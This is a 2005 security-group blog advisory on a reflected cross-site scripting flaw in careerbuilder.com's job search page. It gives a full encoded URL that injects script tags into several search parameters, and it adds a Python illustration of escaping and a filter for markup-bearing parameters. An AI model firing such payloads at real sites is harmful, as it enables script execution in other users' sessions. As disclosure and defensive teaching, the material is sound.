by r0t,der4444,cembo,VietMafia

Friday, December 02, 2005

careerbuilder.com XSS vuln.


Vuln. discovered by: r0t
Date: 2 dec. 2005


Vuln. Description:
Input passed to the search parameters of "JobResults.aspx" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of the affected site.

example:
/JobResults.aspx?S%3Asbkw=%3Cscript%3Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E&S%3Asbcn=%3Cscript%3Ealert%28%27r0t+llove+XSS%27%29%3C%2Fscript%3E&S%3Asbsn=ALL&S%3Asbfr=30&S%3Asbsbmt=Search&cid=US&IPath=ILKG&excrit=QID%3DA6652282763367%3Bst%3DA%3Buse%3DALL%3BrawWords%3D%3Cscript%3Ealert%28%27r0t+lloves+XSS%27%29%3C%2Fscript%3E%3BTID%3D0%3BCTY%3D%3Cscript%3Ealert%28%27r0t+lloves+XSS%27%29%3C%2Fscript%3E%3BSID%3DALL%3BCID%3DUS%3BENR%3DNO%3BDTP%3DDR3%3BYDI%3DYES%3BIND%3DALL%3BPDQ%3DAll%3BJN%3DAll%3BPAYL%3D0%3BPAYH%3DGT120%3BPOY%3DNO%3BETD%3DALL%3BRE%3DALL%3BMGT%3DDC%3BSUP%3DDC%3BFRE%3D30%3BCHL%3DAL%3BQS%3DSID_UNKNOWN%3BSS%3DNO%3BTITL%3D0%3BJQT%3DRAD%3BEXJT%3D%3Cscript%3Ealert%28%27ll%27%29%3C%2Fscript%3E
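An added illustration of the reflection flaw the advisory describes and of its fix; this is not code from the advisory or from careerbuilder.com. The vulnerable rendering reflects the decoded search keyword verbatim, the fixed rendering HTML-escapes it first, and a small request check flags query parameters that carry markup so a reviewer or log filter can spot such requests. The shortened URL, the page template and the function names are constructed for this example; only the parameter names (S:sbkw, S:sbsn) come from the advisory.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed query string modelled on the advisory's example URL (shortened):
# the keyword parameter carries a <script> tag, URL-encoded.
SAMPLE_URL = ("/JobResults.aspx?S%3Asbkw=%3Cscript%3Ealert%28%27xss%27%29"
              "%3C%2Fscript%3E&S%3Asbsn=ALL")


def search_params(url):
    """Decode the query string into {name: first value}, as the server would see it."""
    qs = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(qs, keep_blank_values=True).items()}


def render_results_vulnerable(keyword):
    """Hypothetical page template that reflects the keyword unchanged.

    This is the pattern the advisory describes: whatever the client sent
    is written straight into the HTML response.
    """
    return f"<h2>Results for: {keyword}</h2>"


def render_results_fixed(keyword):
    """Same template, but the keyword is HTML-escaped before reflection,
    so < > & " ' become entities and cannot start a tag or attribute."""
    return f"<h2>Results for: {html.escape(keyword, quote=True)}</h2>"


def reflects_markup(page, value):
    """True when a value containing markup characters appears unescaped in the page.

    A cheap reflection check a tester or developer can run against a
    response: if the raw input survives into the HTML, escaping is missing.
    """
    return ("<" in value or ">" in value) and value in page


def suspicious_params(url):
    """Return the names of query parameters whose decoded value contains
    '<' or '>'; useful as a request-log filter for reflected-XSS attempts."""
    return sorted(name for name, value in search_params(url).items()
                  if "<" in value or ">" in value)


if __name__ == "__main__":
    params = search_params(SAMPLE_URL)
    kw = params["S:sbkw"]
    print("decoded keyword:", kw)
    print("vulnerable page:", render_results_vulnerable(kw))
    print("fixed page:     ", render_results_fixed(kw))
    print("flagged params: ", suspicious_params(SAMPLE_URL))
```

Escaping at the point of output is the fix that matters here; rejecting inputs that contain "<script" is a weak substitute because the same reflection accepts many other tag and attribute forms. The suspicious_params check is meant for detection in logs, not as the only control.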

1 Comments:

Blogger Shawn T Lippert told...

Thank you for the informative blog.
Here are some additional Job Search Resources for Jobs if you or your readers are interested.

1:02 PM

Copyright (c) 2006 Pridels Sec Crew